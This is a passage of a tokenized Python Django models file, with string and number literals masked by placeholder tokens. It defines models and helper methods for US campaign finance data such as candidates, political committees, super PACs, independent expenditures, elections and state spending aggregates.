'<STR_LIT>' <EOL> def short_office ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' % ( self . state ) <EOL> elif self . office == '<STR_LIT:H>' : <EOL> return '<STR_LIT>' % ( self . state , self . office_district ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return "<STR_LIT>" <EOL> def has_next_election ( self ) : <EOL> try : <EOL> if self . not_seeking_reelection or len ( self . candidate_status ) > <NUM_LIT:0> : <EOL> return False <EOL> except TypeError : <EOL> pass <EOL> return True <EOL> def get_absolute_url ( self ) : <EOL> return "<STR_LIT>" % ( self . cycle , self . slug , self . fec_id ) <EOL> def display_party ( self ) : <EOL> if ( self . party ) : <EOL> return "<STR_LIT>" % ( self . party . upper ( ) ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def influence_explorer_url ( self ) : <EOL> if not self . transparencydata_id : <EOL> return None <EOL> return '<STR_LIT>' % ( self . slug , <EOL> self . transparencydata_id ) <EOL> def get_race_url ( self ) : <EOL> url = "<STR_LIT>" <EOL> if self . office == '<STR_LIT:H>' : <EOL> url = "<STR_LIT>" % ( self . cycle , self . office , self . state , self . office_district ) <EOL> elif self . office == '<STR_LIT:S>' : <EOL> url = "<STR_LIT>" % ( self . cycle , self . office , self . state , self . term_class ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> url = "<STR_LIT>" <EOL> return url <EOL> def get_filtered_ie_url ( self ) : <EOL> return "<STR_LIT>" % self . fec_id <EOL> def show_candidate_status ( self ) : <EOL> if self . cand_is_gen_winner and self . is_general_candidate : <EOL> return "<STR_LIT>" <EOL> if self . cand_is_gen_winner == False and self . is_general_candidate : <EOL> return "<STR_LIT>" <EOL> if self . candidate_status : <EOL> try : <EOL> return CANDIDATE_STATUS_DICT [ self . candidate_status ] <EOL> except KeyError : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> def get_general_status ( self ) : <EOL> if self . cand_is_gen_winner == None and self . is_general_candidate : <EOL> return "<STR_LIT>" <EOL> elif self . cand_is_gen_winner and self . is_general_candidate : <EOL> return "<STR_LIT>" <EOL> elif not self . cand_is_gen_winner and self . is_general_candidate : <EOL> return "<STR_LIT>" <EOL> elif not self . is_general_candidate : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> class Incumbent ( models . Model ) : <EOL> is_incumbent = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> name = models . CharField ( max_length = <NUM_LIT:255> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> fec_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> state = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> office = models . CharField ( max_length = <NUM_LIT:1> , null = True , <EOL> choices = ( ( '<STR_LIT:H>' , '<STR_LIT>' ) , ( '<STR_LIT:S>' , '<STR_LIT>' ) , ( '<STR_LIT:P>' , '<STR_LIT>' ) ) <EOL> ) <EOL> office_district = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> class Committee_Overlay ( models . Model ) : <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> ) <EOL> term_class = models . IntegerField ( blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> is_paper_filer = models . NullBooleanField ( null = True , default = False , help_text = "<STR_LIT>" ) <EOL> curated_candidate = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' , null = True , help_text = "<STR_LIT>" ) <EOL> is_dirty = models . NullBooleanField ( null = True , default = True , help_text = "<STR_LIT>" ) <EOL> name = models . CharField ( max_length = <NUM_LIT:255> , help_text = "<STR_LIT>" ) <EOL> display_name = models . CharField ( max_length = <NUM_LIT:255> , null = True ) <EOL> fec_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True , help_text = "<STR_LIT>" ) <EOL> slug = models . SlugField ( max_length = <NUM_LIT:255> ) <EOL> party = models . CharField ( max_length = <NUM_LIT:3> , blank = True , null = True ) <EOL> treasurer = models . CharField ( max_length = <NUM_LIT:200> , blank = True , null = True ) <EOL> street_1 = models . CharField ( max_length = <NUM_LIT> , blank = True , null = True ) <EOL> street_2 = models . CharField ( max_length = <NUM_LIT> , blank = True , null = True ) <EOL> city = models . CharField ( max_length = <NUM_LIT:30> , blank = True , null = True ) <EOL> zip_code = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True ) <EOL> state = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , help_text = '<STR_LIT>' ) <EOL> connected_org_name = models . CharField ( max_length = <NUM_LIT:200> , blank = True , null = True ) <EOL> filing_frequency = models . CharField ( max_length = <NUM_LIT:1> , blank = True , null = True ) <EOL> candidate_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True ) <EOL> candidate_office = models . CharField ( max_length = <NUM_LIT:1> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> has_contributions = models . NullBooleanField ( null = True , default = False ) <EOL> total_receipts = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> total_contributions = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> total_disbursements = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> outstanding_loans = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> total_unitemized = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> cash_on_hand = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> cash_on_hand_date = models . DateField ( null = True , help_text = "<STR_LIT>" ) <EOL> has_independent_expenditures = models . NullBooleanField ( null = True , default = False ) <EOL> total_indy_expenditures = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , help_text = "<STR_LIT>" ) <EOL> ie_support_dems = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> ie_oppose_dems = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> ie_support_reps = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> ie_oppose_reps = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> total_presidential_indy_expenditures = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> has_coordinated_expenditures = models . NullBooleanField ( null = True , default = False ) <EOL> total_coordinated_expenditures = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> has_electioneering = models . NullBooleanField ( null = True , default = False ) <EOL> total_electioneering = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> is_superpac = models . NullBooleanField ( null = True , default = False ) <EOL> is_hybrid = models . NullBooleanField ( null = True , default = False ) <EOL> is_noncommittee = models . NullBooleanField ( null = True , default = False ) <EOL> org_status = models . CharField ( max_length = <NUM_LIT> , <EOL> choices = ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> political_orientation = models . CharField ( max_length = <NUM_LIT:1> , null = True , help_text = "<STR_LIT>" , choices = [ <EOL> ( '<STR_LIT:R>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:D>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:B>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> political_orientation_verified = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> designation = models . CharField ( max_length = <NUM_LIT:1> , <EOL> blank = False , <EOL> null = True , <EOL> choices = [ ( '<STR_LIT:A>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:P>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:B>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:D>' , '<STR_LIT>' ) ] <EOL> ) <EOL> ctype = models . CharField ( max_length = <NUM_LIT:1> , <EOL> blank = False , <EOL> help_text = "<STR_LIT>" , <EOL> null = True , <EOL> choices = [ ( '<STR_LIT:C>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:D>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:E>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:H>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:I>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:N>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:O>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:P>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:S>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:X>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:Y>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> support_unclassified = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> oppose_unclassified = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> support_winners = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> oppose_winners = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> support_losers = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> oppose_losers = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> roi = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> objects = models . Manager ( ) <EOL> nulls_last_objects = NullsLastManager ( ) <EOL> class Meta : <EOL> unique_together = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> ordering = ( '<STR_LIT>' , ) <EOL> def candidate_url ( self ) : <EOL> if self . curated_candidate : <EOL> return self . curated_candidate . get_absolute_url ( ) <EOL> else : <EOL> return None <EOL> def curated_candidate_name ( self ) : <EOL> if self . curated_candidate : <EOL> return '<STR_LIT>' % ( self . curated_candidate . name , self . curated_candidate . party ) <EOL> else : <EOL> return None <EOL> def display_coh_date ( self ) : <EOL> if self . ctype == '<STR_LIT:I>' : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return self . cash_on_hand_date <EOL> def display_coh ( self ) : <EOL> if self . ctype == '<STR_LIT:I>' : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return self . cash_on_hand <EOL> def is_electronic_filer ( self ) : <EOL> return self . is_paper_filer == False <EOL> def curated_candidate_office ( self ) : <EOL> if self . curated_candidate : <EOL> if self . curated_candidate . office == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' % ( self . curated_candidate . state ) <EOL> else : <EOL> return '<STR_LIT>' % ( self . curated_candidate . state , self . curated_candidate . office_district ) <EOL> else : <EOL> return None <EOL> def get_absolute_url ( self ) : <EOL> return ( "<STR_LIT>" % ( self . cycle , self . slug , self . fec_id ) ) <EOL> def get_cycle_url ( self , cycle ) : <EOL> return ( "<STR_LIT>" % ( cycle , self . slug , self . fec_id ) ) <EOL> def is_not_a_committee ( self ) : <EOL> if self . ctype == '<STR_LIT:I>' : <EOL> return True <EOL> return False <EOL> def neg_percent ( self ) : <EOL> if self . total_indy_expenditures == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> else : <EOL> return <NUM_LIT:100> * ( self . ie_oppose_reps + self . ie_oppose_dems ) / self . total_indy_expenditures <EOL> def pos_percent ( self ) : <EOL> if self . total_indy_expenditures == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> else : <EOL> return <NUM_LIT:100> * ( self . ie_support_reps + self . ie_support_dems ) / self . total_indy_expenditures <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> def fec_all_filings ( self ) : <EOL> url = "<STR_LIT>" <EOL> if self . is_paper_filer : <EOL> url = "<STR_LIT>" % ( self . fec_id ) <EOL> else : <EOL> url = "<STR_LIT>" % ( self . fec_id ) <EOL> return url <EOL> def superpac_status ( self ) : <EOL> if ( self . is_superpac ) : <EOL> return '<STR_LIT:Y>' <EOL> else : <EOL> return '<STR_LIT:N>' <EOL> def hybrid_status ( self ) : <EOL> if ( self . is_hybrid ) : <EOL> return '<STR_LIT:Y>' <EOL> else : <EOL> return '<STR_LIT:N>' <EOL> def filing_frequency_text ( self ) : <EOL> if ( self . filing_frequency ) : <EOL> if ( self . filing_frequency . upper ( ) == '<STR_LIT:M>' ) : <EOL> return "<STR_LIT>" <EOL> if ( self . filing_frequency . upper ( ) == '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> if ( self . filing_frequency . upper ( ) == '<STR_LIT:T>' ) : <EOL> return "<STR_LIT>" <EOL> if ( self . filing_frequency . upper ( ) == '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> if ( self . filing_frequency . upper ( ) == '<STR_LIT:A>' ) : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> def display_type ( self ) : <EOL> key = self . ctype <EOL> returnval = '<STR_LIT>' <EOL> try : <EOL> returnval = type_hash [ key ] <EOL> except KeyError : <EOL> pass <EOL> if self . designation == '<STR_LIT:D>' : <EOL> returnval += "<STR_LIT>" <EOL> elif self . designation == '<STR_LIT>' : <EOL> returnval += "<STR_LIT>" <EOL> return returnval <EOL> def display_designation ( self ) : <EOL> key = self . designation <EOL> try : <EOL> return committee_designation_hash [ key ] <EOL> except KeyError : <EOL> return '<STR_LIT>' <EOL> def major_activity ( self ) : <EOL> if ( self . ie_oppose_dems or self . ie_oppose_reps or self . ie_support_dems or self . ie_support_reps ) : <EOL> activity_dict = { '<STR_LIT>' : self . ie_oppose_dems , '<STR_LIT>' : self . ie_oppose_reps , '<STR_LIT>' : self . ie_support_dems , '<STR_LIT>' : self . ie_support_reps } <EOL> activity_rank = sorted ( activity_dict . items ( ) , key = lambda ( k , v ) : ( v ) , reverse = True ) <EOL> return activity_rank [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> else : <EOL> return "<STR_LIT>" <EOL> def get_formatted_roi ( self ) : <EOL> return str ( self . roi * <NUM_LIT:100> ) + "<STR_LIT:%>" <EOL> def total_unclassified ( self ) : <EOL> return <NUM_LIT> + float ( self . support_unclassified or <NUM_LIT:0> ) + float ( self . oppose_unclassified or <NUM_LIT:0> ) <EOL> def get_ge_spending ( self ) : <EOL> return <NUM_LIT> + float ( self . support_winners or <NUM_LIT:0> ) + float ( self . oppose_winners or <NUM_LIT:0> ) + float ( self . support_losers or <NUM_LIT:0> ) + float ( self . oppose_losers or <NUM_LIT:0> ) + float ( self . support_unclassified or <NUM_LIT:0> ) + float ( self . oppose_unclassified or <NUM_LIT:0> ) <EOL> def get_pos_ge_spending ( self ) : <EOL> return <NUM_LIT> + float ( self . support_winners or <NUM_LIT:0> ) + float ( self . support_losers or <NUM_LIT:0> ) + float ( self . support_unclassified or <NUM_LIT:0> ) <EOL> def get_neg_ge_spending ( self ) : <EOL> return <NUM_LIT> + float ( self . oppose_winners or <NUM_LIT:0> ) + float ( self . oppose_losers or <NUM_LIT:0> ) + float ( self . oppose_unclassified or <NUM_LIT:0> ) <EOL> def display_political_orientation ( self ) : <EOL> p = self . political_orientation <EOL> if p == '<STR_LIT:D>' : <EOL> return "<STR_LIT>" <EOL> elif p == '<STR_LIT:R>' : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> def get_filtered_ie_url ( self ) : <EOL> return "<STR_LIT>" % ( self . fec_id ) <EOL> class ElectionSummary ( models . Model ) : <EOL> district = models . ForeignKey ( '<STR_LIT>' , editable = False ) <EOL> incumbent_name = models . CharField ( max_length = <NUM_LIT:255> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> incumbent_party = models . CharField ( max_length = <NUM_LIT:1> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> election_winner = models . ForeignKey ( '<STR_LIT>' , null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> election_year = models . IntegerField ( help_text = "<STR_LIT>" ) <EOL> election_date = models . DateField ( null = True , help_text = "<STR_LIT>" ) <EOL> election_summary_code = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , choices = ELECTION_TYPE_CHOICES ) <EOL> has_primary_runoff = models . NullBooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> primary_runoff_date = models . DateField ( null = True , help_text = "<STR_LIT>" ) <EOL> primary_runoff_needed = models . NullBooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> has_general_runoff = models . NullBooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> general_runoff_date = models . DateField ( null = True , help_text = "<STR_LIT>" ) <EOL> general_runoff_needed = models . NullBooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> candidate_raised = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> candidate_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> coordinated_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> outside_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> total_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . district , self . election_summary_code , self . district . incumbent_name , self . district . incumbent_party ) <EOL> class Election ( models . Model ) : <EOL> district = models . ForeignKey ( '<STR_LIT>' ) <EOL> election = models . ForeignKey ( '<STR_LIT>' ) <EOL> election_winner = models . ForeignKey ( '<STR_LIT>' , null = True ) <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> election_year = models . IntegerField ( help_text = "<STR_LIT>" ) <EOL> start_date = models . DateField ( null = True ) <EOL> election_date = models . DateField ( null = True , help_text = "<STR_LIT>" ) <EOL> election_code = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , choices = ELECTION_TYPE_CHOICES ) <EOL> election_other_description = models . CharField ( max_length = <NUM_LIT:20> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> is_contested = models . NullBooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> candidate_raised = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> candidate_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> coordinated_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> outside_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> total_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> def __unicode__ ( self ) : <EOL> return_value = "<STR_LIT>" <EOL> if self . office == '<STR_LIT:S>' : <EOL> return_value = '<STR_LIT>' % ( self . state , self . term_class , self . election_year , self . election_code ) <EOL> else : <EOL> return_value = '<STR_LIT>' % ( self . state , self . office_district , self . election_year , self . election_code ) <EOL> return_value += "<STR_LIT>" % ( self . incumbent_name ) <EOL> return return_value <EOL> class Committee_Time_Summary ( models . Model ) : <EOL> com_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True ) <EOL> com_name = models . CharField ( max_length = <NUM_LIT:255> , null = True , blank = True ) <EOL> filing_number = models . IntegerField ( null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> tot_receipts = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> tot_contrib = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> tot_ite_contrib = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> tot_non_ite_contrib = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> tot_disburse = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> ind_exp_mad = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> coo_exp_par = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> new_loans = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> outstanding_loans = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> electioneering_made = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> cash_on_hand_end = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> coverage_from_date = models . DateField ( null = True ) <EOL> coverage_through_date = models . DateField ( null = True ) <EOL> data_source = models . CharField ( max_length = <NUM_LIT:10> , help_text = "<STR_LIT>" ) <EOL> def get_absolute_url ( self ) : <EOL> if self . filing_number : <EOL> return "<STR_LIT>" % ( self . filing_number ) <EOL> else : <EOL> url = "<STR_LIT>" % ( self . com_id ) <EOL> return url <EOL> def get_committee_url ( self ) : <EOL> return "<STR_LIT>" % ( slugify ( self . com_name ) , self . com_id ) <EOL> def get_skeda_url ( self ) : <EOL> if self . filing_number : <EOL> return "<STR_LIT>" % ( self . filing_number ) <EOL> else : <EOL> return None <EOL> def get_skedb_url ( self ) : <EOL> if self . filing_number : <EOL> return "<STR_LIT>" % ( self . filing_number ) <EOL> else : <EOL> return None <EOL> def get_fec_url ( self ) : <EOL> if self . filing_number : <EOL> url = "<STR_LIT>" % ( self . com_id , self . filing_number ) <EOL> return url <EOL> else : <EOL> url = "<STR_LIT>" % ( self . com_id ) <EOL> return url <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . com_name , self . coverage_from_date , self . coverage_through_date ) <EOL> class Authorized_Candidate_Committees ( models . Model ) : <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> candidate_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True ) <EOL> committee_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True ) <EOL> committee_name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> is_pcc = models . NullBooleanField ( null = True ) <EOL> com_type = models . CharField ( max_length = <NUM_LIT:1> , help_text = "<STR_LIT>" ) <EOL> ignore = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> """<STR_LIT>""" <EOL> class Filing_Gap ( models . Model ) : <EOL> committee_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True ) <EOL> gap_start = models . DateField ( null = True ) <EOL> gap_end = models . DateField ( null = True ) <EOL> """<STR_LIT>""" <EOL> class Pac_Candidate ( models . Model ) : <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , null = True , blank = True ) <EOL> committee = models . ForeignKey ( '<STR_LIT>' ) <EOL> candidate = models . ForeignKey ( '<STR_LIT>' ) <EOL> support_oppose = models . CharField ( max_length = <NUM_LIT:1> , <EOL> choices = ( ( '<STR_LIT:S>' , '<STR_LIT>' ) , ( '<STR_LIT:O>' , '<STR_LIT>' ) ) <EOL> ) <EOL> total_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_ec = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_coord_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT>' , ) <EOL> def __unicode__ ( self ) : <EOL> return self . committee , self . candidate <EOL> def support_or_oppose ( self ) : <EOL> if ( self . support_oppose . upper ( ) == '<STR_LIT:O>' ) : <EOL> return '<STR_LIT>' <EOL> elif ( self . support_oppose . upper ( ) == '<STR_LIT:S>' ) : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> class State_Aggregate ( models . Model ) : <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , null = True , blank = True ) <EOL> state = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True ) <EOL> expenditures_supporting_president = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> expenditures_opposing_president = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_pres_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> expenditures_supporting_house = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> expenditures_opposing_house = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_house_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> expenditures_supporting_senate = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> expenditures_opposing_senate = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_senate_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> recent_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> recent_pres_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_ec = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_coord = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> def __unicode__ ( self ) : <EOL> return STATE_CHOICES [ self . state ] <EOL> def get_absolute_url ( self ) : <EOL> return "<STR_LIT>" % ( self . state ) <EOL> class DistrictWeekly ( models . Model ) : <EOL> district = models . ForeignKey ( '<STR_LIT>' ) <EOL> start_date = models . DateField ( null = True ) <EOL> end_date = models . DateField ( null = True , help_text = "<STR_LIT>" ) <EOL> cycle_week_number = models . IntegerField ( null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> coordinated_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> outside_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> total_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> objects = models . Manager ( ) <EOL> nulls_last_objects = NullsLastManager 